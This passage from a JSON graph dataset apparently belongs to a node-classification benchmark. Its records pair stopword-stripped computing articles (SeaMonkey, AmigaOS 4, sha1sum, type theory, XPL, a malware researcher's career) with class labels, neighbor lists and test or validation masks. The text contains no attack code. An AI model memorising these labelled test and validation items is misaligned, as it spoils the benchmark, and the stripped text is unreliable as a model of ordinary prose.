    "text": "SeaMonkey:seamonkey seamonkey free open-source internet suite continuation former mozilla application suite based source code grew netscape communicator formed base netscape 6 netscape 7 seamonkey created 2005 mozilla foundation decided focus standalone projects firefox thunderbird development seamonkey community-driven contrast mozilla application suite last released version 1.7.13 governed mozilla foundation new project-leading group called seamonkey council compared firefox seamonkey web browser keeps traditional-looking interface netscape mozilla suite many xul-based firefox thunderbird add-ons modified compatibility seamonkey although add-ons built webextensions architecture used newer firefox versions yet compatible seamonkey consists web browser descendant netscape family e-mail news client program seamonkey mail newsgroups shares code mozilla thunderbird html editor seamonkey composer software suite supports skins comes two skins default installation modern classic recent versions include irc client chatzilla installed extension seamonkey mail traditional e-mail client includes support multiple accounts junk mail detection message filters html message support address books among features shares code mozilla thunderbird thunderbird seamonkey built mozilla comm-central source tree seamonkey composer wysiwyg html editor main user interface features four tabs normal wysiwyg html tags html code browser preview generated code html 4.01 transitional seamonkey composer longer actively maintained underlying editor code shared mail component seamonkey project releases official builds linux macos windows also releases “ unofficial ” x86-64 builds linux avoid confusing organizations still want use original mozilla suite new product needed new name initial speculation members community july 2 2005 announcement confirmed seamonkey would officially become name internet suite superseding mozilla suite seamonkey lowercase refers brine shrimp used netscape mozilla foundation code name never-released netscape communicator 5 later mozilla suite originally name seamonkey derived netscape management replace buttmonkey developers chosen following internal contest codename.. seamonkey council trademarked name help mozilla foundation project uses separate numbering scheme first release called seamonkey 1.0 despite different name version number seamonkey 1.0 based code mozilla suite 1.7 trademark copyright reasons debian rebranded seamonkey distributed iceape 2013 march 10 2005 mozilla foundation announced would release official versions mozilla application suite beyond 1.7.x since focused standalone applications firefox thunderbird however foundation emphasized would still provide infrastructure community members wished continue development effect meant suite would still continue developed seamonkey council instead mozilla foundation seamonkey first released september 15 2005 seamonkey 1 released january 30 2006 core mozilla project source code licensed disjunctive tri-license changing mpl 2.0 gave choice one three following sets licensing terms mozilla public license version 1.1 later gnu general public license version 2.0 later gnu lesser general public license version 2.1 later seamonkey council team responsible project release management currently consists philip chee karsten düsterloh jens hatlak robert kaiser ian neal neil rashbrook justin wood parts table based seamonkey release notes roadmap meeting notes",
    "neighbors": [
      513,
      2050,
      6657,
      9736,
      6154,
      2579,
      9747,
      6171,
      2076,
      9757,
      7713,
      3110,
      10791,
      9770,
      559,
      1075,
      2101,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      9281,
      4171,
      5707,
      3578,
      10834,
      5205,
      6231,
      7255,
      8281,
      2139,
      6747,
      6237,
      7785,
      1642,
      9834,
      10860,
      10861,
      9841,
      115,
      9843,
      3191,
      119,
      4728,
      637,
      1664,
      641,
      5251,
      2182,
      6791,
      6797,
      11418,
      10910,
      8351,
      7340,
      1713,
      7346,
      9394,
      9908,
      7861,
      9909,
      185,
      11449,
      4797,
      6338,
      7364,
      11466,
      10956,
      7885,
      11469,
      9424,
      7889,
      4310,
      2777,
      8923,
      737,
      4326,
      4331,
      4844,
      5356,
      9451,
      11503,
      9459,
      11000,
      6393,
      8443,
      9986,
      9987,
      7943,
      1295,
      1807,
      7951,
      2836,
      278,
      3350,
      10006,
      7965,
      1834,
      7983,
      823,
      7488,
      10057,
      11082,
      10060,
      2893,
      10078,
      11112,
      8557,
      7543,
      3961,
      7036,
      6528,
      3971,
      3462,
      8584,
      3465,
      4490,
      6028,
      10126,
      7572,
      10133,
      2462,
      5026,
      9642,
      4013,
      944,
      5054,
      9152,
      6086,
      3015,
      9167,
      4048,
      5078,
      479,
      482,
      10722,
      5605,
      487,
      8169,
      5612,
      494,
      1520,
      7152,
      6133,
      5622,
      5114,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 6232,
    "label": 4,
    "text": "Network_enclave:network enclave network enclave section internal network subdivided rest network purpose network enclave limit internal access portion network necessary set resources differs general network surroundings typically network enclaves publicly accessible internal accessibility restricted use internal firewalls vlans network admissions control vpns network enclaves consist standalone assets interact information systems networks major difference dmz demilitarized zone network enclave dmz allows inbound outbound traffic access firewall boundaries traversed enclave firewall boundaries traversed enclave protection tools used provide protection within specific security domains mechanisms installed part intranet connect networks similar security requirements dmz established within enclave host publicly accessible systems ideal design build dmz separate network interface enclave perimeter firewall dmz traffic would routed firewall processing dmz would still kept separate rest protected network",
    "neighbors": [
      5608,
      939,
      5749
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6233,
    "label": 3,
    "text": "AmigaOS_4_version_history:amigaos 4 version history new version amigaos released december 24 2006 five years development hyperion entertainment belgium license amiga inc. amigaone registered users five years development users amigaone machines could download hyperion repository pre-release versions amigaos 4.0 long made available witnessed many users amiga discussion forum sites versions stable reliable despite fact technically labeled pre-releases last stable version amigaos 4.0 amigaone computers july 2007 update released download 18 july 2007 registered users amigaone machines amigaos 4 classic released commercially older amiga computers cyberstormppc blizzardppc accelerator cards november 2007 previously available developers beta-testers new version powerpc-native finally abandoning motorola 68k processor amigaos 4.0 run powerpc hardware currently includes a1200 a3000 a4000 powerpc accelerator boards amigaone motherboards amiga inc. distribution policies amigaos 4.0 later versions require third-party hardware os must bundled sole exception amigas phase 5 powerpc accelerator boards os sold separately amigaos 4.0 final introduced new memory system based slab allocator features among others developer pre-release version snapshot amigaos 4.0 amigaone contained html installation guide english german french italian amigaos 4.0 sdk amigaos 4.0 sdk allowed creation new software migration existing amigaos versions 3.x source code os 4.0 amigaos 4.0 developer pre-release update came form full iso image 33 mb needed burned cd-r w user intended replace original amigaos 4.0 developer pre-release cd installation rescue purposes release date 10 october 2004 among features amigaos 4.0 developer pre-release update came form free download registered users update featured usb stack update i.e mass storage support numerous bug fixes enhancements core components system release date 27 december 2004 release date 14 june 2005 following non-exhaustive list features update 3 prominent features fourth amigaos 4.0 developer pre-release update return screen dragging ability petunia just-in-time 68k emulator release date 8 february 2006 new features pre-release include 24 december 2006 final update released came iso image ≈45 mb burned onto cd cd bootable may used standalone installation cd amigaos 4.0 final update introduced new memory system based slab allocator features amigaos 4.0 among others release date 18 july 2007 improvements amigaos 4.0 july 2007 update amigaos 4.0 amiga 1200 amiga 3000 amiga 4000 series computers equipped phase5 powerup powerpc accelerator cards put sale november 2007 feature set equal july 2007 update drivers amiga expansion cards devices minor improvements e.g amigainput update amigaos 4.0 classic amiga computers addressed issues compatibility problems release date 23 february 2008 amigaos 4.1 presented public july 11 2008 put sale september 2008 new version simple update features among others amigaos 4.1 presented public 11 july 2008 put sale september 2008 new version simple update features among others 21 june 2009 hyperion entertainment announced immediate availability quick fix package amigaone sam/sam flex pegasos ii features include 14 january 2010 hyperion entertainment announced immediate availability amigaos 4.1 update 1 first full update amigaos 4.1 features include upgrades following 30 april 2010 hyperion entertainment announced immediate availability update 2 amigaos 4.1 amigaone sam440ep pegasos ii registered users features 17 may 2011 amigaos 4.1 commodore amigas powerup accelerators released august 29 2011 hyperion entertainment made available update 3 amigaos 4.1 amigaone sam440ep sam 460 classic amigas ppc cards pegasos ii registered users final bugfixes updates amigaos 4.1 new features reserved os 4.2 december 22 2011 hyperion entertainment released minor update correct many bugfixes third update amigaos 4.1 introduces something new update 5 first public release amigaone x1000 28 january 2012 later 16 august 2012 update 5 released platforms update 6 released november 30 2012 rather unusual update regard included bug fixes except new ide xena kicklayout files amigaone x1000 update consisted mainly new efficient way delivering bug fixes new update software ... menu item workbench launch amiupdate handles future amigaos 4 software updates amigaos 4.1 final edition released 18 december 2014 new functionality amigaos 4.1 final edition includes",
    "neighbors": [
      5264,
      2193,
      9236,
      3233,
      8609,
      9249,
      8618,
      6062,
      7342,
      432,
      8369,
      8115,
      6075,
      11076,
      1349,
      10570,
      5709,
      5840,
      4564,
      4567,
      8554,
      11370,
      5743,
      1776,
      11123,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 6234,
    "label": 2,
    "text": "Susan_Kare:susan kare susan kare born february 5 1954 artist graphic designer created many interface elements typefaces apple macintosh 1980s also creative director one original employees next company formed steve jobs left apple 1985 worked microsoft ibm pinterest facebook kare born ithaca new york sister aerospace engineer jordin kare.in high school worked museum designer harry loucks introduced typography graphic design graduated harriton high school 1971 graduated summa cum laude b.a art mount holyoke college 1975 received ph.d. new york university 1978 next moved san francisco worked fine arts museums kare joined apple computer receiving call high school friend andy hertzfeld early 1980s member original apple macintosh design team worked apple starting 1982 badge 3978 kare originally hired macintosh software group design user interface graphics fonts business cards read hi macintosh artist later creative director apple creative services working director organization tom suiter designer many typefaces icons original marketing material original macintosh operating system descendants groundbreaking work still seen many computer graphics tools accessories especially icons lasso grabber paint bucket designs created first visual language apple new point-and-click computing presentation layers design conference san francisco revealed command icon apple keyboards originally symbol used denote notable interesting features swedish campgrounds kare early pioneer pixel art recognizable works time apple chicago typeface prominent user-interface typeface seen classic mac os interfaces system 1 1984 mac os 9 1999 well typeface used first four generations apple ipod interface geneva typeface original monospace monaco typeface clarus dogcow happy mac icon smiling computer welcomed mac users starting machines command key symbol apple keyboards icons drew many sources art history wacky gadgets forgotten hieroglyphics mac concept command symbol taken saint hannes cross symbol place interest leaving apple kare joined next designer working clients microsoft ibm projects microsoft included card deck windows 3.0 solitaire game well numerous icons design elements windows 3.0 many icons notepad various control panels remained essentially unchanged microsoft windows xp ibm produced icons design elements os/2 eazel contributed iconography nautilus file manager 2003 became member advisory board glam media mode media 2006 2010 produced icons gifts feature facebook initially profits gift sales donated susan g. komen cure foundation valentine day 2007 gift selection modified include new limited edition gifts necessarily pertain valentine day one gift icons titled big kiss also featured versions mac os x user account picture 2007 designed identity icons website chumby industries inc. well interface internet-enabled alarm clock since 2008 museum modern art store new york city carried stationery notebooks featuring designs 2015 moma also acquired notebooks sketches led early mac icons august 2012 called expert witness apple company patent-infringement trial industry competitor samsung see apple inc. v. samsung electronics co. 2015 kare hired pinterest product design lead heads digital design practice san francisco sells limited-edition signed fine-art prints currently uses adobe photoshop adobe illustrator make designs logos recognition design work kare awarded american institute graphic arts medal april 2018 married three sons",
    "neighbors": [
      7307,
      9999,
      5520,
      10386,
      6554,
      4251,
      11420,
      9123,
      10406,
      7983,
      9778,
      576,
      10432,
      9035,
      7640,
      350,
      2282,
      1389,
      11118,
      3323,
      7806,
      511
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6235,
    "label": 1,
    "text": "Fabian_Pascal:fabian pascal fabian pascal consultant large software vendors ibm oracle corporation borland better known author seminar speaker born romania pascal lives san francisco ca area us works association christopher j date pascal known sharp criticisms data management industry trade press current state higher education western culture alleged media bias pascal advocates strict adherence principles relational model argues departing model name pragmatism responsible serious data management troubles criticism pascal advocacy often centers around polemical style perceive overly confrontational unprofessional political commentary postwest blog decline western education civilization middle east issues",
    "neighbors": [
      3323,
      2901,
      11327
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6236,
    "label": 8,
    "text": "PoorMan:poorman poorman simple light-weight web server bundled beos haiku operating system poorman lets users create run websites also knows serve html pages graphics web-based information minimal set hassle ideal small personal servers prototyping web sites use poorman users must set website folder poorman serve pages html format 1 launch poorman desktop alert pop-up let specify folder want use choose default /boot/home/public_html 2 dismiss web site alert poorman main window appears menu bar status line tell web server running stopped 3.to toggle status use server command controls run server command notice poorman starts web server automatically default",
    "neighbors": [
      225,
      3631,
      3312,
      7983,
      2045,
      1374
    ],
    "mask": "None"
  },
  {
    "node_id": 6237,
    "label": 8,
    "text": "Daylife:daylife daylife offers on-demand features media apps served cloud provides digital media management tools content feeds publishers brand marketers developers daylife founded 2006 raised 15m investment date recently strategic investor getty images company headquartered downtown new york city daylife products include daylife publisher suite range apis set hosted solutions including smart topics smart galleries smart sections hosted solutions launched partnership getty images allow publishers source manage compose sites media components pages complete sections content daylife technology analyzes 100,000 curated content feeds allows publishers curate automate media enhance proprietary content clients include usa today bloomberg businessweek npr mashable sky news forbes thomson reuters 80 others daylife publisher suite allows publishers marketers deploy on-demand media features apps cloud onto digital channel clicks features apps managed simple browser-based dashboard smartgalleries suite tools allow publishers create image galleries customizable widgets full-page formats publishers hand-select images automatically fill galleries based keywords daylife getty images launched smartgalleries september 2009 conjunction investment announcement smarttopics tools publishers create media-rich pages specific topics linking proprietary content related media videos images links tweets selected publisher smartsections tools allow publishers compose launch full content sections verticals like travel basketball featuring real-time media proprietary outside sources selected editor daylife developer apis programming platform media highly flexible scalable serving 1.5 billion calls per month july 2011 apis let developers source combine synthesize news media content applications apis ingest parse analyze media content exposing hundreds ways query deliver scale free paid access available example semantic web daylife analyzes continuous stream media content maps connections news topics enables dynamic news navigation topic country journalist medium timeline geography daylife founded 2006 chief executive officer upendra shardanand company released apis 2008 2009 daylife named one top 50 tech startups businessweek top 50 real-time web companies readwriteweb daylife funded balderton capital arts alliance new york times getty images angel investors include michael arrington john borthwick andrew rasiej dave winer jeff jarvis partner daylife 2012 daylife acquired newscred",
    "neighbors": [
      1664,
      3971,
      8584,
      4490,
      10126,
      11418,
      2076,
      8735,
      1834,
      4013,
      559,
      9908,
      7488,
      10057,
      5205,
      4310,
      5078,
      6231,
      10722,
      5605,
      8169,
      9451,
      8557,
      11000,
      5114
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6238,
    "label": 4,
    "text": "Sha1sum:sha1sum computer program calculates verifies sha-1 hashes commonly used verify integrity files variant installed default unix-like operating systems variants include permits sha-1 sha-512 hash functions selected manually use specific sha-2 hash function permits sha-3 sha3-512 shake rawshake keccak functions selected manually versions microsoft windows also exist activeperl distribution includes perl implementation shasum freebsd openbsd utilities called md5 sha1 sha256 sha512 versions offer slightly different options features additionally freebsd offers skein family message digests sha-1 variants proven vulnerable collision attacks users use example sha-2 variant sha256sum instead prevent tampering adversary included gnu core utilities busybox toybox create file sha1 hash one provided distributing one file .sha1 may appended filename e.g output contains one line per file form codice_1 note well hash digest creation performed text mode instead binary mode two space characters instead single space character asterisk example verify file downloaded correctly sha1sum create checksums one multiple files inside directory directory tree i.e subdirectories sub-subdirectories etc files contain possible using sha1sum combination commands find xargs optionally sort files sorted checksum file sha1deep create checksums directory tree also use sha1sum exec",
    "neighbors": [
      3393,
      516,
      6954,
      6797,
      5397,
      823,
      5759
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6239,
    "label": 9,
    "text": "Intuitionistic_type_theory:intuitionistic type theory intuitionistic type theory also known constructive type theory martin-löf type theory type theory alternative foundation mathematics intuitionistic type theory created per martin-löf swedish mathematician philosopher first published 1972 multiple versions type theory martin-löf proposed intensional extensional variants theory early impredicative versions shown inconsistent girard paradox gave way predicative versions however versions keep core design constructive logic using dependent types martin-löf designed type theory principles mathematical constructivism constructivism requires existence proof contain witness proof exists prime greater 1000 must identify specific number prime greater 1000 intuitionistic type theory accomplished design goal internalizing bhk interpretation interesting consequence proofs become mathematical objects examined compared manipulated intuitionistic type theory type constructors built follow one-to-one correspondence logical connectives example logical connective called implication formula_1 corresponds type function formula_2 correspondence called curry–howard isomorphism previous type theories also followed isomorphism martin-löf first extend predicate logic introducing dependent types intuitionistic type theory 3 finite types composed using 5 different type constructors unlike set theories type theories built top logic like frege feature type theory double duty feature math logic unfamiliar type theory know set theory quick summary types contain terms like sets contain elements terms belong one one type terms like formula_3 formula_4 compute reduce canonical terms like 4 see article type theory 3 finite types 0 type contains 0 terms 1 type contains 1 canonical term 2 type contains 2 canonical terms 0 type contains 0 terms also called empty type used represent anything exist also written formula_5 represents anything unprovable proof exist result negation defined function formula_6 likewise 1 type contains 1 canonical term represents existence also called unit type often represents propositions proven therefore sometimes written formula_7 finally 2 type contains 2 canonical terms represents definite choice two values used boolean values propositions propositions considered 1 type may proven never proof 0 type may proven either way law excluded middle hold propositions intuitionistic type theory σ-types contain ordered pairs typical ordered pair 2-tuple types σ-type describe cartesian product formula_8 two types formula_9 formula_10 logically ordered pair would hold proof formula_9 proof formula_10 one may see type written formula_13 σ-types powerful typical ordered pair types dependent typing ordered pair type second term depend value first term example first term pair might natural number second term type might vector length equal first term type would written using set-theory terminology similar indexed disjoint unions sets case usual ordered pairs type second term depend value first term thus type describing cartesian product formula_15 written important note value first term formula_17 depended type second term formula_18 obviously σ-types used build longer dependently-typed tuples used mathematics records structs used programming languages example dependently-typed 3-tuple two integers proof first integer smaller second integer described type dependent typing allows σ-types serve role existential quantifier statement exists formula_17 type formula_21 formula_22 proven becomes type ordered pairs first item value formula_17 type formula_21 second item proof formula_22 notice type second item proofs formula_22 depends value first part ordered pair formula_17 type would π-types contain functions typical function types consist input type output type powerful typical function types however return type depend input value functions type theory different set theory set theory look argument value set ordered pairs type theory argument substituted term computation reduction applied term example type function given natural number formula_17 returns vector containing formula_17 real numbers written output type depend input value function type often simply written formula_32 thus formula_33 type functions natural numbers real numbers π-types correspond logical implication logical proposition formula_1 corresponds type formula_2 containing functions take proofs-of-a return proofs-of-b type could written consistently π-types also used logic universal quantification statement every formula_17 type formula_21 formula_22 proven becomes function formula_17 type formula_21 proofs formula_22 thus given value formula_17 function generates proof formula_44 holds value type would =-types created two terms given two terms like formula_3 formula_47 create new type formula_48 terms new type represent proofs pair reduce canonical term thus since formula_3 formula_4 compute canonical term formula_51 term type formula_48 intuitionistic type theory single way make terms =-types reflexivity possible create =-types formula_54 terms reduce canonical term unable create terms new type fact able create term formula_54 could create term formula_5 putting function would generating function type formula_57 since formula_58 intuitionistic type theory defines negation would formula_59 finally formula_60 equality proofs area active research proof theory led development homotopy type theory type theories inductive types allow creation complex self-referential types example linked list natural numbers either empty list pair natural number another linked list inductive types used define unbounded mathematical structures like trees graphs etc.. fact natural numbers type may defined inductive type either formula_61 successor another natural number inductive types define new constants zero formula_62 successor function formula_63 since formula_64 definition evaluated using substitution terms like formula_65 formula_66 become canonical terms natural numbers proofs inductive types made possible induction new inductive type comes inductive rule prove predicate formula_44 every natural number use following rule inductive types intuitionistic type theory defined terms w-types type well-founded trees later work type theory generated coinductive types induction-recursion induction-induction working types obscure kinds self-referentiality higher inductive types allow equality defined terms universe types allow proofs written types created type constructors every term universe type formula_69 mapped type created combination formula_70 inductive type constructor however avoid paradoxes term formula_69 maps formula_69 write proofs small types formula_69 must use formula_74 contain term formula_69 formula_74 similarly formula_77 predicative hierarchy universes quantify proof fixed constant formula_78 universes use formula_79 universe types tricky feature type theories martin-löf original type theory changed account girard paradox later research covered topics super universes mahlo universes impredicative universes formal definition intuitionistic type theory written using judgements example statement formula_9 type formula_10 type formula_82 type judgements type ... ... expression formula_82 judgement type defined second level type theory confusing particularly comes equality judgement term equality might say formula_84 statement two terms reduce canonical term also judgement type equality say formula_85 means every element formula_9 element type formula_10 vice versa type level type formula_84 contains terms proof formula_51 formula_3 reduce value obviously terms type generated using term-equality judgement lastly english-language level equality use word four symbol formula_51 refer canonical term formula_92 synonyms like called definitionally equal martin-löf description judgements based discussion nordström petersson smith formal theory works types objects type declared object exists type objects equal types equal type depends object another type declared removed substitution object depends object another type done two ways object abstracted written removed substitution object-depending-on-object also declared constant part recursive type example recursive type formula_64 constant object-depending-on-object associated abstraction constants like formula_64 removed defining equality relationship addition defined using equality using pattern matching handle recursive aspect formula_64 formula_64 manipulated opaque constant internal structure substitution objects types relations used express formulae theory following styles judgements used create new objects types relations existing ones convention type represents types called formula_114 formula_115 since formula_114 type member objects dependent type formula_117 maps object corresponding type texts formula_117 never written context statement reader almost always tell whether formula_9 refers type whether refers object formula_114 corresponds type complete foundation theory everything else derived implement logic proposition given type objects types represent different possible ways prove proposition obviously proof proposition type objects operators like work propositions introduce new types new objects formula_121 type depends type formula_9 type formula_10 objects dependent type defined exist every pair objects formula_9 formula_10 obviously formula_9 formula_10 proof empty type new type representing formula_128 also empty done types booleans natural numbers etc operators using language category theory r. a. g. seely introduced notion locally cartesian closed category lccc basic model type theory refined hofmann dybjer categories families categories attributes based earlier work cartmell category families category c contexts objects contexts context morphisms substitutions together functor c → fam set fam set category families sets objects pairs index set function b x → morphisms pairs functions f → g x → x b g f b words f maps b b functor assigns context g set types set terms axioms functor require play harmoniously substitution substitution usually written form af af type term f substitution g category c must contain terminal object empty context final object form product called comprehension context extension right element type context left element g context object final among contexts mappings p → g q tm ap logical framework martin-löf takes form closure conditions context dependent sets types terms type called set set type types closed forms dependent sum product forth theory predicative set theory expresses closure conditions types sets elements closed operations reflect dependent sum product various forms inductive definition fundamental distinction extensional vs intensional type theory extensional type theory definitional i.e. computational equality distinguished propositional equality requires proof consequence type checking becomes undecidable extensional type theory programs theory might terminate example theory allows one give type y-combinator detailed example found nordstöm petersson programming martin-löf type theory however n't prevent extensional type theory basis practical tool example nuprl based extensional type theory practical standpoint difference program n't terminate program takes million years terminate contrast intensional type theory type checking decidable representation standard mathematical concepts somewhat cumbersome since intensional reasoning requires using setoids similar constructions many common mathematical objects hard work ca n't represented without example integer numbers rational numbers real numbers integers rational numbers represented without setoids representation n't easy work cauchy real numbers ca n't represented without homotopy type theory works resolving problem allows one define higher inductive types define first order constructors values points higher order constructors i.e equalities elements paths equalities equalities homotopies ad infinitum different forms type theory implemented formal systems underlying number proof assistants many based per martin-löf ideas many added features axioms different philosophical background instance nuprl system based computational type theory coq based calculus co inductive constructions dependent types also feature design programming languages ats cayenne epigram agda idris per martin-löf constructed several type theories published various times much later preprints description became accessible specialists among others jean-yves girard giovanni sambin list attempts list theories described printed form sketch key features distinguished theories dependent products dependent sums disjoint unions finite types natural numbers theories reduction rules include η-reduction either dependent products dependent sums except mltt79 η-reduction dependent products added mltt71 first type theories created per martin-löf appeared preprint 1971 one universe universe name i.e type theory called today type type jean-yves girard shown system inconsistent preprint never published mltt72 presented 1972 preprint published theory one universe v identity types universe predicative sense dependent product family objects v object v example v assumed v. universe à la russell i.e. one would write directly t∈v t∈t martin-löf uses sign ∈ instead modern without additional constructor el mltt73 first definition type theory per martin-löf published presented logic colloquium 73 published 1975 identity types calls propositions since real distinction propositions rest types introduced meaning unclear later acquires name j-eliminator yet without name see pp 94–95 theory infinite sequence universes v ... v ... universes predicative a-la russell non-cumulative fact corollary 3.10 p. 115 says a∈v b∈v b convertible m=n means example would difficult formulate univalence theory—there contractible types v unclear declare equal since identity types connecting v v i≠j mltt79 presented 1979 published 1982 paper martin-löf introduced four basic types judgement dependent type theory since became fundamental study meta-theory systems also introduced contexts separate concept see p. 161 identity types j-eliminator already appeared mltt73 name also rule makes theory extensional p. 169 w-types infinite sequence predicative universes cumulative bibliopolis discussion type theory bibliopolis book 1984 somewhat open-ended seem represent particular set choices specific type theory associated",
    "neighbors": [
      4101,
      5783,
      11674,
      10145,
      5796,
      6188,
      3762,
      11574,
      4791,
      3767,
      8251,
      8511,
      6087,
      8788,
      8924,
      10460,
      8926,
      5365,
      3702,
      11125,
      11641,
      9466,
      1019,
      2556,
      5885
    ],
    "mask": "Test"
  },
  {
    "node_id": 6240,
    "label": 2,
    "text": "SCSI_Pass-Through_Direct:scsi pass-through direct scsi pass direct sptd proprietary device driver application programming interface api developed duplex secure ltd. provides new method access scsi storage devices sptd api open public sptd used daemon tools alcohol 120 also utilized powerarchiver pro 2010 v11.60+ however configurable option available disable known incompatible kernel-mode debugging including windbg microsoft command line debuggers well softice certain versions freeware optical media burning software imgburn issue warning sptd detrimental effect drive performance application detects sptd active installed conexware inc. maker powerarchiver claims internal testing sptd improved optical drive performance 20 percent comparison old school scsi pass interface",
    "neighbors": [
      5380,
      8262,
      10027,
      10155,
      6797,
      7983,
      3860
    ],
    "mask": "Test"
  },
  {
    "node_id": 6241,
    "label": 4,
    "text": "Christopher_Boyd_(IT_security):christopher boyd security christopher boyd also known online pseudonym paperghost computer security researcher boyd director malware research security company facetime becoming senior threat researcher sunbelt software later known gfi software december 2013 malwarebytes announced boyd joined malware intelligence team research new threats july 2004 boyd launched vitalsecurity.org website bringing public attention issues privacy spyware november 2004 modular hacking technique employed compromise windows end-users hacking apache servers hacked servers would redirect user server websites leading set ever-changing infection pages pages employed recoded viruses trojans malware spyware technique used heavily today groups behind spyware coolwebsearch cws idea alternative browsers opera firefox could somehow enhance end-user security cut march 2005 discovery java applet agreed would install large varied adware bundle onto end-user pc found rogue site user blocklists security tools would nothing install bypassing tactics completely end-user clicked yes updated firefox .xpi installer infected internet explorer also deployed installs june 2005 discovered adware makers turning alternative sources installs end-users become aware common install tactics reliance crude social engineering p2p systems previously clean rise boyd discovered bittorrent forums file-sharing sites used major source distribution aurora program produced direct revenue number major adware programs wrapped bundles produced metrix marketing group mmg company lost control network potentially copyright infringing files illegal pornography incorrect absent disclosure exposed scale cause companies involved direct revenue 180solutions others publicly declare discontinuation methods story caused uproar numerous media pundits weighed cases made delicate situation worse article john c. dvorak pc magazine alleged boyd part grand microsoft conspiracy bad-mouth bittorrent benefit planned p2p tool avalanche furious p2p users familiar backstory investigation even went far say boyd league riaa create problems file-sharers bringing bundles light however dvorak piece caused something approaching outrage side fence leading fellow ziff davis media publication go head head dvorak dave methvin pc pitstop followed investigation findings alleges films distributed contained potentially illegal underage pornography long mmg went offline adware companies pulled particular distribution october 2005 boyd discovered fake google toolbar distributed via instant messaging toolbar allowed user store credit card details also opened fake google search page boyd also tracked toolbar back 2003 three different versions one exploiting vulnerabilities windows operating system october november 2005 boyd discovered considered first known instance rootkit distributed via instant messaging hidden inside large payload adware spyware period months group behind attacks distributed numerous inventive payloads forced install bittorrent spread movie files eventually traced back middle-east boyd notoriously fierce critic adware companies famously causing 180solutions label fanatic weblog bad feeling evidence sides day regularly referenced leading antispyware sites sunbelt blog suzi turner zdnet blog ben edelman home page 2006 boyd continued make significant discoveries field security including",
    "neighbors": [
      8582,
      8584,
      877,
      4883,
      5078,
      10392,
      11225,
      7515,
      2558,
      9791
    ],
    "mask": "None"
  },
  {
    "node_id": 6242,
    "label": 9,
    "text": "XPL:xpl xpl programming language based pl/i portable one-pass compiler written language parser generator tool easily implementing similar compilers languages xpl designed 1967 way teach compiler design principles starting point students build compilers languages xpl designed implemented william m. mckeeman david b. wortman university california santa cruz james j. horning others stanford university xpl first announced 1968 fall joint computer conference methods compiler described detail 1971 textbook compiler generator called combined work 'compiler generator implies little language- target-specific programming required build compiler new language new target better label xpl translator writing system helps write compiler less new changed programming code xpl language simple small efficient dialect pl/i intended mainly task writing compilers xpl language also used purposes available xpl compiled easily modern machines simple compiler compiler internals written easily xpl code easy read pl/i language designed ibm committee 1964 comprehensive language replacing fortran cobol algol meeting customer internal needs ambitious goals made pl/i complex hard implement efficiently sometimes surprising used xpl small dialect full language xpl one added feature found pl/i string datatype dynamic lengths string values live separate text-only heap memory space automatic garbage collection stale values much simple compiler manipulating input text output byte streams feature helps simplify xpl-based compilers xpl compiler called xcom one-pass compiler using table-driven parser simple code generation techniques versions xcom exist different machine architectures using different hand-written code generation modules targets original target ibm system/360 proper subset ibm system/370 ibm system/390 ibm system z. xcom compiles xpl source code since xcom written xpl compile – self-compiling compiler reliant compilers several famous languages self-compiling compilers including burroughs b5000 algol pl/i c lisp java creating compilers chicken-and-egg conundrum language first implemented temporary compiler written language even interpreter often interpreter intermediate code bcpl intcode o-code xcom began algol program running burroughs machines translating xpl source code system/360 machine code xpl team manually turned algol source code xpl source code xpl version xcom compiled burroughs creating self-compiling xcom system/360 machines algol version thrown away improvements happened xpl version called bootstrapping compiler authors xpl invented tombstone diagram t-diagram document bootstrapping process retargeting compiler new machine architecture similar exercise except code generation modules need changed xcom one-pass compiler emitted code fix-up process forward branches loops defined situations emits machine code statement grammar rule within statement recognized rather waiting parsed entire procedure entire program parse trees required intermediate program forms loop-wide procedure-wide optimizations xcom however perform peephole optimization code generation response grammar rule attached rule immediate approach result inefficient code inefficient use machine registers offset efficiency implementation namely use dynamic strings mentioned earlier processing text compilation substring operations frequently performed fast assignment integer actual substring moved short quick easy teach short course fits modest-sized memories easy change different languages different target machines xcom compiler hand-written lexical scanner mechanically-generated parser syntax compiler input language case xpl described simplified bnf grammar xpl grammar analyzer tool analyzer xa turns set large data tables describing legal combinations syntax rules discern table generation step re-done language changed compiler runs data tables used small language-independent parsing algorithm parse respond input language style table-driven parser generally easier write entirely hand-written recursive descent parser xcom uses bottom-up parsing method compiler delay decision syntax rule encountered seen rightmost end phrase handles wider range programming languages top-down methods compiler must guess commit specific syntax rule early seen left end phrase xpl includes minimal runtime support library allocating garbage-collecting xpl string values source code library must included every program written xpl last piece xpl compiler writing system example compiler named skeleton xcom parse tables example toy grammar instead xpl full grammar starting point building compiler new language language differs much xpl xpl run control monitor xmon operating system-specific part system acts loader xcom programs developed using xcom also provides three auxiliary storage devices xcom use directly accessed block number originally published xmon optimized ibm 2311 disk drives ca 1964 efficient drives xmon 50 percent efficient ibm 2314 disk drives ca 1965 significantly less efficient subsequently introduced disk drives ibm 3330 ca 1970 3330-11 ca 1973 3350 ca 1975 dramatically less efficient devices much larger track capacities ibm 3390 ca 1989 converting xmon primitive use note point read/write disk operations precisely one block per track entire remainder track erased hence wasted space excp xdap n blocks per track n computed target device physical characteristics significantly greater 1 wasted space yields dramatic increase disk utilization efficiency corresponding reduction operating system overhead although originally developed os/360 xmon either original note point read/write implementation excp xdap enhancement run subsequently released ibm oses including os/370 xa os/390 z/os generally without changes xcom originally used now-obsolete bottom-up parse table method called mixed strategy precedence invented xpl team although officially released version retains msp parser include later-released peephole optimizations additional data types developed outside original implementation team msp generalization simple precedence parser method invented niklaus wirth pl360 simple precedence generalization trivially simple operator precedence methods work nicely expressions like a+b* c+d -e. msp tables include list expected triplets language symbols list grows larger cube grammar size becomes quite large typical full programming languages xpl-derived compilers difficult fit onto minicomputers 1970s limited memories msp also powerful enough handle likely grammars applicable language designer tweak language definition fit msp restrictions language widely used university toronto subsequently changed xcom xa instead use variant donald knuth lr parser bottom-up method xcom variant called simple lr slr handles grammars msp quite many grammars lalr full lr 1 differences lr 1 mostly table generator algorithms compile-time parser method xcom xa predate widespread availability unix yacc parser generator tool xa yacc similar purposes xpl open source system/360 version xpl distributed ibm share users organization groups ported xpl onto many larger machines 1970s various groups extended 